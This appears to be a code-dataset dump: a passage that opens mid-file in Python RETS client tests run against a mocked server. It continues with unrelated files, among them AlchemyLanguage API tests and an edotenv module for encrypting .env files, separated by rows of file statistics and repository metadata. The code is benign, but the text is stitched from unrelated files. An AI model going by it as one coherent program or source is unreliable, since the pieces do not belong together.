contents = ''.join(f.readlines())
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_classes_single.xml') as f:
single_contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
resource_classes = self.session.get_class_metadata(resource='Agent')
self.assertEqual(len(resource_classes), 6)
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=single_contents, status=200)
resource_classes_single = self.session.get_class_metadata(resource='Property')
self.assertEqual(len(resource_classes_single), 1)
def test_search(self):
with open('tests/rets_responses/COMPACT-DECODED/Search.xml') as f:
search_contents = ''.join(f.readlines())
with open('tests/rets_responses/Errors/Error_InvalidFormat.xml') as f:
invalid_contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Search.ashx',
body=search_contents, status=200, stream=True)
results = self.session.search(resource='Property',
resource_class='RES',
search_filter={'ListingPrice': 200000})
self.assertEqual(len(results), 3)
resps.add(resps.POST, 'http://server.rets.com/rets/Search.ashx',
body=search_contents, status=200, stream=True)
results1 = self.session.search(resource='Property',
resource_class='RES',
limit=3,
dmql_query='ListingPrice=200000',
optional_parameters={'RestrictedIndicator': '!!!!'})
self.assertEqual(len(results1), 3)
resps.add(resps.POST, 'http://server.rets.com/rets/Search.ashx',
body=invalid_contents, status=200, stream=True)
with self.assertRaises(RETSException):
r = self.session.search(resource='Property',
resource_class='RES',
dmql_query='ListingPrice=200000',
optional_parameters={'Format': "Somecrazyformat"})
print(r)
def test_auto_offset(self):
with open('tests/rets_responses/COMPACT-DECODED/Search_1of2.xml') as f:
search1_contents = ''.join(f.readlines())
with open('tests/rets_responses/COMPACT-DECODED/Search_2of2.xml') as f:
search2_contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Search.ashx',
body=search1_contents, status=200, stream=True)
resps.add(resps.POST, 'http://server.rets.com/rets/Search.ashx',
body=search2_contents, status=200, stream=True)
results = self.session.search(resource='Property',
resource_class='RES',
search_filter={'ListingPrice': 200000})
self.assertEqual(len(results), 6)
def test_cache_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_table.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
self.session.get_table_metadata(resource='Property', resource_class='RES')
self.assertIn('METADATA-TABLE:Property:RES', list(self.session.metadata_responses.keys()))
# Subsequent call without RequestMock should fail unless we get the saved response from metadata_responses
table = self.session.get_table_metadata(resource='Property', resource_class='RES')
self.assertEqual(len(table), 208)
def test_table_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_table.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
table = self.session.get_table_metadata(resource='Property', resource_class='RES')
self.assertEqual(len(table), 208)
def test_lookup_type_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_lookup.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
lookup_values = self.session.get_lookup_values(resource='Agent', lookup_name='Broker')
self.assertEqual(len(lookup_values), 61)
def test_object_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_objects.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
object_metadata = self.session.get_object_metadata(resource='Agent')
self.assertEqual(len(object_metadata), 3)
def test_agent_digest_hash(self):
self.session.user_agent_password = "testing"
self.assertIsNotNone(self.session._user_agent_digest_hash())
def test_session_cookie_name(self):
self.assertEqual(self.session.session_id, 'zacqcc1gjhkmazjznjmyrinq')
def test_change_parser_automatically(self):
self.assertEqual(self.session.metadata_format, 'COMPACT-DECODED')
with open('tests/rets_responses/Errors/20514.xml') as f:
dtd_error = ''.join(f.readlines())
with open('tests/rets_responses/STANDARD-XML/GetMetadata_system.xml') as f:
content = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=dtd_error, status=200)
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=content, status=200)
self.session.get_system_metadata()
self.assertEqual(self.session.metadata_format, 'STANDARD-XML')
class Session15Tester(unittest.TestCase):
def setUp(self):
super(Session15Tester, self).setUp()
with open('tests/rets_responses/Login.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Login.ashx',
body=contents, status=200)
self.session = Session(login_url='http://server.rets.com/rets/Login.ashx', username='retsuser',
version='1.5')
self.session.metadata_format = 'STANDARD-XML'
self.session.login()
def test_system_metadata(self):
with open('tests/rets_responses/STANDARD-XML/GetMetadata_system.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
sys_metadata = self.session.get_system_metadata()
self.assertEqual(sys_metadata['version'], '45.61.69081')
self.assertEqual(sys_metadata['system_id'], 'RETS')
def test_resource_metadata(self):
with open('tests/rets_responses/STANDARD-XML/GetMetadata_resources.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
resource = self.session.get_resource_metadata()
self.assertEqual(len(resource), 2)
def test_class_metadata(self):
with open('tests/rets_responses/STANDARD-XML/GetMetadata_classes.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
resource_classes = self.session.get_class_metadata(resource='Agent')
self.assertEqual(len(resource_classes), 8)
def test_table_metadata(self):
with open('tests/rets_responses/STANDARD-XML/GetMetadata_table.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
table = self.session.get_table_metadata(resource='Property', resource_class='1')
self.assertEqual(len(table), 162)
def test_lookup_type_metadata(self):
with open('tests/rets_responses/STANDARD-XML/GetMetadata_lookup.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
lookup_values = self.session.get_lookup_values(resource='Property', lookup_name='1_2')
self.assertEqual(len(lookup_values), 9)
def test_object_metadata(self):
with open('tests/rets_responses/STANDARD-XML/GetMetadata_objects.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
object_metadata = self.session.get_object_metadata(resource='Agent')
self.assertEqual(len(object_metadata), 1)
class LoginTester(unittest.TestCase):
def test_login(self):
expected_capabilities1 = {
u'GetMetadata': u'http://server.rets.com/rets/GetMetadata.ashx',
u'GetObject': u'http://server.rets.com/rets/GetObject.ashx',
u'Login': u'http://server.rets.com/rets/Login.ashx',
u'Logout': u'http://server.rets.com/rets/Logout.ashx',
u'PostObject': u'http://server.rets.com/rets/PostObject.ashx',
u'Search': u'http://server.rets.com/rets/Search.ashx',
u'Update': u'http://server.rets.com/rets/Update.ashx'
}
expected_capabilities2 = {
u'GetMetadata': u'http://server.rets.com/rets/GetMetadata.ashx',
u'GetObject': u'http://server.rets.com/rets/GetObject.ashx',
u'Login': u'http://server.rets.com/rets/Login.ashx',
u'Logout': u'http://server.rets.com/rets/Logout.ashx',
u'Search': u'http://server.rets.com/rets/Search.ashx',
}
with open('tests/rets_responses/Login.xml') as f:
contents = ''.join(f.readlines())
with open('tests/rets_responses/Logout.html') as f:
logout_contents = ''.join(f.readlines())
with open('tests/rets_responses/Errors/Login_no_host.xml') as f:
no_host_contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Login.ashx',
body=contents, status=200)
s = Session(login_url='http://server.rets.com/rets/Login.ashx', username='retsuser', version='1.5')
s.login()
self.assertEqual(s.capabilities, expected_capabilities1)
self.assertEquals(s.version, '1.5')
resps.add(resps.POST, 'http://server.rets.com/rets/Login.ashx',
body=contents, status=200)
resps.add(resps.POST, 'http://server.rets.com/rets/Logout.ashx',
body=logout_contents, status=200)
with Session(login_url='http://server.rets.com/rets/Login.ashx', username='retsuser', version='1.7.2') as s:
# I logged in here and will log out when leaving context
pass
resps.add(resps.POST, 'http://server.rets.com/rets/Login_no_host.ashx',
body=no_host_contents, status=200, headers={'RETS-Version': 'RETS/1.7.2'})
s1 = Session(login_url='http://server.rets.com/rets/Login_no_host.ashx', username='retsuser', version='1.5')
s1.login()
self.assertDictEqual(s1.capabilities, expected_capabilities2)
self.assertEquals(s.version, '1.7.2')
def test_login_with_action(self):
with open('tests/rets_responses/Login_with_Action.xml') as f:
action_login = ''.join(f.readlines())
with open('tests/rets_responses/Action.xml') as f:
action_response = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Login_with_Action.ashx',
body=action_login, status=200)
resps.add(resps.GET, 'http://server.rets.com/rets/Action.ashx',
body=action_response, status=200)
s2 = Session(login_url='http://server.rets.com/rets/Login_with_Action.ashx', username='retsuser',
version='1.5')
s2.login()
self.assertIn(u'Action', list(s2.capabilities.keys()))
| 46.535545
| 120
| 0.611977
| 2,260
| 19,638
| 5.198673
| 0.094248
| 0.04511
| 0.063154
| 0.076687
| 0.82807
| 0.791727
| 0.736403
| 0.730871
| 0.702017
| 0.673589
| 0
| 0.023437
| 0.254761
| 19,638
| 421
| 121
| 46.646081
| 0.779365
| 0.008097
| 0
| 0.529968
| 0
| 0
| 0.265455
| 0.094989
| 0
| 0
| 0
| 0
| 0.116719
| 1
| 0.082019
| false
| 0.006309
| 0.012618
| 0
| 0.104101
| 0.003155
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
69a319ad6b6c6f4cea8b2535a255071544000e23
| 110
|
py
|
Python
|
django_presentation/forms/fields/__init__.py
|
adamkerz/django-presentation
|
1e812faa5f682e021fa6580509d8d324cfcc119c
|
[
"BSD-3-Clause"
] | null | null | null |
django_presentation/forms/fields/__init__.py
|
adamkerz/django-presentation
|
1e812faa5f682e021fa6580509d8d324cfcc119c
|
[
"BSD-3-Clause"
] | null | null | null |
django_presentation/forms/fields/__init__.py
|
adamkerz/django-presentation
|
1e812faa5f682e021fa6580509d8d324cfcc119c
|
[
"BSD-3-Clause"
] | null | null | null |
from .GroupedModelChoiceField import GroupedModelChoiceField
from .TypedChoiceField import TypedChoiceField
| 36.666667
| 61
| 0.890909
| 8
| 110
| 12.25
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 110
| 2
| 62
| 55
| 0.98
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
69b1ec4426e52180e95f3ba65c412433f6571439
| 62
|
py
|
Python
|
package_eg_test1.py
|
PhyuAye/python_exercises
|
ea22acd4ad3a099fbaf2c70913db6b361b2c9c45
|
[
"MIT"
] | null | null | null |
package_eg_test1.py
|
PhyuAye/python_exercises
|
ea22acd4ad3a099fbaf2c70913db6b361b2c9c45
|
[
"MIT"
] | null | null | null |
package_eg_test1.py
|
PhyuAye/python_exercises
|
ea22acd4ad3a099fbaf2c70913db6b361b2c9c45
|
[
"MIT"
] | null | null | null |
import package_example1.ex41
package_example1.ex41.convert()
| 15.5
| 31
| 0.854839
| 8
| 62
| 6.375
| 0.625
| 0.588235
| 0.745098
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 0.064516
| 62
| 3
| 32
| 20.666667
| 0.775862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
69be3a8152c1fc429f338e7135134177c4e25733
| 122
|
py
|
Python
|
src/the_tale/the_tale/game/balance/context_processors.py
|
devapromix/the-tale
|
2a10efd3270734f8cf482b4cfbc5353ef8f0494c
|
[
"BSD-3-Clause"
] | 1
|
2020-04-02T11:51:20.000Z
|
2020-04-02T11:51:20.000Z
|
src/the_tale/the_tale/game/balance/context_processors.py
|
devapromix/the-tale
|
2a10efd3270734f8cf482b4cfbc5353ef8f0494c
|
[
"BSD-3-Clause"
] | null | null | null |
src/the_tale/the_tale/game/balance/context_processors.py
|
devapromix/the-tale
|
2a10efd3270734f8cf482b4cfbc5353ef8f0494c
|
[
"BSD-3-Clause"
] | null | null | null |
import smart_imports
smart_imports.all()
def balance(request):
return {'c': constants,
'f': formulas}
| 12.2
| 27
| 0.631148
| 14
| 122
| 5.357143
| 0.857143
| 0.32
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.245902
| 122
| 9
| 28
| 13.555556
| 0.815217
| 0
| 0
| 0
| 0
| 0
| 0.016529
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
69bece59b33a658fd613e575349f904fb66d7cf6
| 4,211
|
py
|
Python
|
test/test_alchemy_language_v1.py
|
trishamoyer/python-sdk
|
d13578971d26e439f1c2ef6bb51e686657110fcb
|
[
"Apache-2.0"
] | 1
|
2021-02-02T13:39:02.000Z
|
2021-02-02T13:39:02.000Z
|
test/test_alchemy_language_v1.py
|
ricardyn/python-sdk
|
9a4ee5b630c325bb551de0ceffeeceda40c704f7
|
[
"Apache-2.0"
] | null | null | null |
test/test_alchemy_language_v1.py
|
ricardyn/python-sdk
|
9a4ee5b630c325bb551de0ceffeeceda40c704f7
|
[
"Apache-2.0"
] | null | null | null |
from unittest import TestCase
import watson_developer_cloud
import responses
import pytest
class TestAlchemyLanguageV1(TestCase):
def test_api_key(self):
default_url = 'https://gateway-a.watsonplatform.net/calls'
inited = watson_developer_cloud.AlchemyLanguageV1(url=default_url, api_key='boguskey',
x_watson_learning_opt_out=True)
assert inited.api_key == 'boguskey'
assert inited.url == default_url
inited.set_url(url="http://google.com")
assert inited.url == "http://google.com"
# with pytest.raises(watson_developer_cloud.WatsonException):
# watson_developer_cloud.AlchemyLanguageV1()
# with pytest.raises(watson_developer_cloud.WatsonException):
# watson_developer_cloud.AlchemyLanguageV1(api_key='YOUR API KEY')
def test_unpack_id(self):
testdict = {'one': 10}
assert watson_developer_cloud.AlchemyLanguageV1.unpack_id(testdict, 'one') == 10
assert watson_developer_cloud.AlchemyLanguageV1.unpack_id(testdict, 'two') == testdict
@responses.activate
def test_author(self):
url = 'https://gateway-a.watsonplatform.net'
default_url = 'https://gateway-a.watsonplatform.net/calls'
responses.add(responses.POST, '{0}/html/HTMLGetAuthor'.format(url),
body='{"bogus": "response"}', status=200,
content_type='application/json')
responses.add(responses.POST, '{0}/url/URLGetAuthor'.format(url),
body='{"bogus": "response"}', status=200,
content_type='application/json')
responses.add(responses.POST, '{0}/html/HTMLGetAuthor'.format(default_url),
body='{"bogus": "response"}', status=200,
content_type='application/json')
responses.add(responses.POST, '{0}/url/URLGetAuthor'.format(default_url),
body='{"bogus": "response"}', status=200,
content_type='application/json')
alang = watson_developer_cloud.AlchemyLanguageV1(url=url, api_key='boguskey', x_watson_learning_opt_out=True)
alang.author(html="I'm html")
alang.author(url="http://google.com")
with pytest.raises(watson_developer_cloud.WatsonInvalidArgument):
alang.author()
alang = watson_developer_cloud.AlchemyLanguageV1(url=default_url, api_key='boguskey',
x_watson_learning_opt_out=True)
alang.author(html="I'm html")
alang.author(url="http://google.com")
assert len(responses.calls) == 4
@responses.activate
def test_auth_exception(self):
default_url = 'https://gateway-a.watsonplatform.net/calls'
responses.add(responses.POST, '{0}/url/URLGetAuthor'.format(default_url),
body='{"bogus": "response"}', status=401,
content_type='application/json')
alang = watson_developer_cloud.AlchemyLanguageV1(url=default_url, api_key='boguskey',
x_watson_learning_opt_out=True)
with pytest.raises(watson_developer_cloud.WatsonException):
alang.author(url="http://google.com")
assert len(responses.calls) == 1
@responses.activate
def test_authors(self):
default_url = 'https://gateway-a.watsonplatform.net/calls'
responses.add(responses.POST, '{0}/url/URLGetAuthors'.format(default_url),
body='{"bogus": "response"}', status=200,
content_type='application/json')
responses.add(responses.POST, '{0}/html/HTMLGetAuthors'.format(default_url),
body='{"bogus": "response"}', status=200,
content_type='application/json')
alang = watson_developer_cloud.AlchemyLanguageV1(url=default_url, api_key='boguskey',
x_watson_learning_opt_out=True)
alang.authors(url="http://google.com")
alang.authors(html="<h1>Author</h1>")
assert len(responses.calls) == 2
| 48.965116
| 117
| 0.616006
| 443
| 4,211
| 5.659142
| 0.180587
| 0.083765
| 0.111687
| 0.132828
| 0.806143
| 0.797367
| 0.784204
| 0.763861
| 0.751895
| 0.732349
| 0
| 0.015098
| 0.260746
| 4,211
| 85
| 118
| 49.541176
| 0.790235
| 0.055806
| 0
| 0.5
| 0
| 0
| 0.201712
| 0.022161
| 0
| 0
| 0
| 0
| 0.117647
| 1
| 0.073529
| false
| 0
| 0.058824
| 0
| 0.147059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
69dde79a841bd695c013122f58f94992058d8754
| 59
|
py
|
Python
|
hooks/charmhelpers/core/services/__init__.py
|
projectcalico/charm-bird
|
3224e887329c527f6bed2520346e66fb4e795fe8
|
[
"Apache-2.0"
] | null | null | null |
hooks/charmhelpers/core/services/__init__.py
|
projectcalico/charm-bird
|
3224e887329c527f6bed2520346e66fb4e795fe8
|
[
"Apache-2.0"
] | null | null | null |
hooks/charmhelpers/core/services/__init__.py
|
projectcalico/charm-bird
|
3224e887329c527f6bed2520346e66fb4e795fe8
|
[
"Apache-2.0"
] | 1
|
2022-03-16T16:12:32.000Z
|
2022-03-16T16:12:32.000Z
|
from .base import * # NOQA
from .helpers import * # NOQA
| 19.666667
| 30
| 0.661017
| 8
| 59
| 4.875
| 0.625
| 0.512821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.237288
| 59
| 2
| 31
| 29.5
| 0.866667
| 0.152542
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0e09e1c83e073f6265e296047962a0cd54a61a89
| 10,628
|
py
|
Python
|
src/edotenv/core.py
|
rrwen/python-edotenv
|
3292d100aab53a53d526dddf5b495b3f31609d8b
|
[
"MIT"
] | 1
|
2022-03-12T12:29:30.000Z
|
2022-03-12T12:29:30.000Z
|
src/edotenv/core.py
|
rrwen/python-edotenv
|
3292d100aab53a53d526dddf5b495b3f31609d8b
|
[
"MIT"
] | 1
|
2022-03-12T12:37:43.000Z
|
2022-03-12T12:37:43.000Z
|
src/edotenv/core.py
|
rrwen/python-edotenv
|
3292d100aab53a53d526dddf5b495b3f31609d8b
|
[
"MIT"
] | null | null | null |
import os
from dotenv import load_dotenv, dotenv_values
from io import StringIO
from .encryption import *
def dotenv_to_edotenv(dotenv_path='.env', edotenv_path='.env', key_path=None, *args, **kwargs):
"""
Encrypt a .env file.
Parameters
----------
dotenv_path : str
The path of the .env file.
edotenv_path : str
The path of the encrypted .env file.
key_path : str or None
The path to the key used to encrypt and decrypt the .env file.
* If the file does not exist, then a key file will be automatically generated
* If ``None``, defaults to a file inside the package's directory
*args, **kwargs
Additional arguments passed to `dotenv.dotenv_values <https://saurabh-kumar.com/python-dotenv/reference/dotenv/main/#dotenv_values>`_.
Example
-------
.. jupyter-execute::
import tempfile
import os
from edotenv import dotenv_to_edotenv, load_edotenv
with tempfile.TemporaryDirectory() as folder:
# Remove vars for testing
if 'TESTINGA' in os.environ:
del os.environ['TESTINGA']
if 'TESTINGB' in os.environ:
del os.environ['TESTINGB']
# Create a .env file with vars TESTINGA and TESTINGB
dotenv_path = f'{folder}/.env'
with open(dotenv_path, 'w') as dotenv_file:
dotenv_file.write('TESTINGA=testinga123\\nTESTINGB=testingb123')
# Check if the vars exist
print('TESTINGA in env (not loaded): ' + str('TESTINGA' in os.environ))
print('TESTINGB in env (not loaded): ' + str('TESTINGA' in os.environ))
# Encrypt the .env file
edotenv_path = f'{folder}/.env.encrypted'
key_path = f'{folder}/.env.key'
dotenv_to_edotenv(dotenv_path, edotenv_path, key_path)
# Load the encrypted .env file
load_edotenv(edotenv_path, key_path)
# Check if vars exist again
print('TESTINGA value (loaded): ' + str(os.environ['TESTINGA']))
print('TESTINGB value (loaded): ' + str(os.environ['TESTINGB']))
"""
# Get .env file data
values = dotenv_values(dotenv_path, *args, **kwargs)
data = '\n'.join([v + '=' + values[v] for v in values])
# Get the key from file or gen key file if not exists
key = read_key_file(key_path)
# Save encrypted .env file
edata = encrypt(data, key)
with open(edotenv_path, 'wb') as edotenv_file:
edotenv_file.write(edata)
def edotenv_to_dotenv(dotenv_path='.env', edotenv_path='.env', key_path=None, *args, **kwargs):
"""
Decrypt a .env file.
Parameters
----------
dotenv_path : str
The path of the .env file.
edotenv_path : str
The path of the encrypted .env file.
key_path : str or None
The path to the key used to encrypt and decrypt the .env file.
* If the file does not exist, then a key file will be automatically generated
* If ``None``, defaults to a file inside the package's directory
Example
-------
.. jupyter-execute::
import tempfile
import os
from dotenv import load_dotenv
from edotenv import dotenv_to_edotenv, load_edotenv, edotenv_to_dotenv
with tempfile.TemporaryDirectory() as folder:
# Remove vars for testing
if 'TESTINGA' in os.environ:
del os.environ['TESTINGA']
if 'TESTINGB' in os.environ:
del os.environ['TESTINGB']
# Create a .env file with vars TESTINGA and TESTINGB
dotenv_path = f'{folder}/.env'
with open(dotenv_path, 'w') as dotenv_file:
dotenv_file.write('TESTINGA=testinga123\\nTESTINGB=testingb123')
# Check if the vars exist
print('TESTINGA in env (not loaded): ' + str('TESTINGA' in os.environ))
print('TESTINGB in env (not loaded): ' + str('TESTINGA' in os.environ))
# Encrypt the .env file
edotenv_path = f'{folder}/.env.encrypted'
key_path = f'{folder}/.env.key'
dotenv_to_edotenv(dotenv_path, edotenv_path, key_path)
# Load the encrypted .env file
load_edotenv(edotenv_path, key_path)
# Check if vars exist again
print('TESTINGA value (loaded): ' + str(os.environ['TESTINGA']))
print('TESTINGB value (loaded): ' + str(os.environ['TESTINGB']))
# Decrypt the .env file
dotenv_path = f'{folder}/.env.decrypted'
edotenv_to_dotenv(dotenv_path, edotenv_path, key_path)
# Remove vars for testing
if 'TESTINGA' in os.environ:
del os.environ['TESTINGA']
if 'TESTINGB' in os.environ:
del os.environ['TESTINGB']
# Check if the vars exist after removal for testing decrypted file
print('TESTINGA in env (before loading decrypt): ' + str('TESTINGA' in os.environ))
print('TESTINGB in env (before loading decrypt): ' + str('TESTINGA' in os.environ))
# Load the decrypted .env file
load_dotenv(dotenv_path)
# Check if vars exist again after loading decrypted file
print('TESTINGA value (after loading decrypt): ' + str(os.environ['TESTINGA']))
print('TESTINGB value (after loading decrypt): ' + str(os.environ['TESTINGB']))
"""
# Read encrypted .env file
with open(edotenv_path, 'rb') as edotenv_file:
edata = edotenv_file.read()
# Get the key from file or gen key file if not exists
key = read_key_file(key_path)
# Decrypt env vars and save to .env file
data = decrypt(edata, key)
with open(dotenv_path, 'w') as dotenv_file:
dotenv_file.write(data)
def load_edotenv(edotenv_path='.env', key_path=None, *args, **kwargs):
"""
Load environmental varables from an encrypted .env file.
Parameters
----------
edotenv_path : str
The path of the encrypted .env file.
key_path : str or None
The path to the key used to encrypt and decrypt the .env file. If ``None``, defaults to a file inside the package's directory.
*args, **kwargs
Additional arguments passed to `dotenv.load_dotenv <https://saurabh-kumar.com/python-dotenv/reference/dotenv/main/#load_dotenv>`_.
Example
-------
.. jupyter-execute::
import tempfile
import os
from edotenv import dotenv_to_edotenv, load_edotenv
with tempfile.TemporaryDirectory() as folder:
# Remove vars for testing
if 'TESTINGA' in os.environ:
del os.environ['TESTINGA']
if 'TESTINGB' in os.environ:
del os.environ['TESTINGB']
# Create a .env file with vars TESTINGA and TESTINGB
dotenv_path = f'{folder}/.env'
with open(dotenv_path, 'w') as dotenv_file:
dotenv_file.write('TESTINGA=testinga123\\nTESTINGB=testingb123')
# Check if the vars exist
print('TESTINGA in env (not loaded): ' + str('TESTINGA' in os.environ))
print('TESTINGB in env (not loaded): ' + str('TESTINGA' in os.environ))
# Encrypt the .env file
edotenv_path = f'{folder}/.env.encrypted'
key_path = f'{folder}/.env.key'
dotenv_to_edotenv(dotenv_path, edotenv_path, key_path)
# Load the encrypted .env file
load_edotenv(edotenv_path, key_path)
# Check if vars exist again
print('TESTINGA value (loaded): ' + str(os.environ['TESTINGA']))
print('TESTINGB value (loaded): ' + str(os.environ['TESTINGB']))
"""
# Read encrypted .env file
with open(edotenv_path, 'rb') as edotenv_file:
edata = edotenv_file.read()
# Get the key from file or gen key file if not exists
key = read_key_file(key_path, create_if_not_exists=False)
# Decrypt env vars and load them
data = decrypt(edata, key)
stream = StringIO(data)
load_dotenv(stream=stream, *args, **kwargs)
def save_edotenv(vars, edotenv_path='.env', key_path=None):
"""
Load environmental varables from an encrypted .env file.
Parameters
----------
edotenv_path : str
The path of the encrypted .env file.
key_path : str or None
The path to the key used to encrypt and decrypt the .env file.
* If the file does not exist, then a key file will be automatically generated
* If ``None``, defaults to a file inside the package's directory
vars : str OR list
A list of the environmental variable names to save into the encrypted .env file.
Example
-------
.. jupyter-execute::
import tempfile
import os
from edotenv import save_edotenv, load_edotenv
with tempfile.TemporaryDirectory() as folder:
# Remove vars for testing
if 'TESTINGA' in os.environ:
del os.environ['TESTINGA']
if 'TESTINGB' in os.environ:
del os.environ['TESTINGB']
# Set env vars TESTINGA and TESTINGB
os.environ['TESTINGA'] = 'testinga123'
os.environ['TESTINGB'] = 'testingb123'
# Check the values of the vars
print('TESTINGA value (before save): ' + str(os.environ['TESTINGA']))
print('TESTINGB value (before save): ' + str(os.environ['TESTINGB']))
# Save an encrypted .env file of the vars
edotenv_path = f'{folder}/.env.encrypted'
key_path = f'{folder}/.env.key'
vars = ['TESTINGA', 'TESTINGB']
save_edotenv(vars, edotenv_path, key_path)
# Load the encrypted .env file
load_edotenv(edotenv_path, key_path)
# Check if the vars loaded correctly from encrypted .env file
print('TESTINGA value (after save): ' + str(os.environ['TESTINGA']))
print('TESTINGB value (after save): ' + str(os.environ['TESTINGB']))
"""
# Get the key from file or gen key file if not exists
key = read_key_file(key_path)
# Get and encrypt env vars
vars = vars if isinstance(vars, list) else [vars]
data = '\n'.join([v + '=' + str(os.environ[v]) for v in vars])
edata = encrypt(data, key)
# Save encrypted .env file
with open(edotenv_path, 'wb') as edotenv_file:
edotenv_file.write(edata)
| 35.66443
| 142
| 0.601336
| 1,342
| 10,628
| 4.658718
| 0.085693
| 0.0619
| 0.03167
| 0.039507
| 0.84453
| 0.817818
| 0.795905
| 0.778311
| 0.737204
| 0.71881
| 0
| 0.00321
| 0.296575
| 10,628
| 298
| 143
| 35.66443
| 0.833066
| 0.780203
| 0
| 0.46875
| 0
| 0
| 0.024778
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.125
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
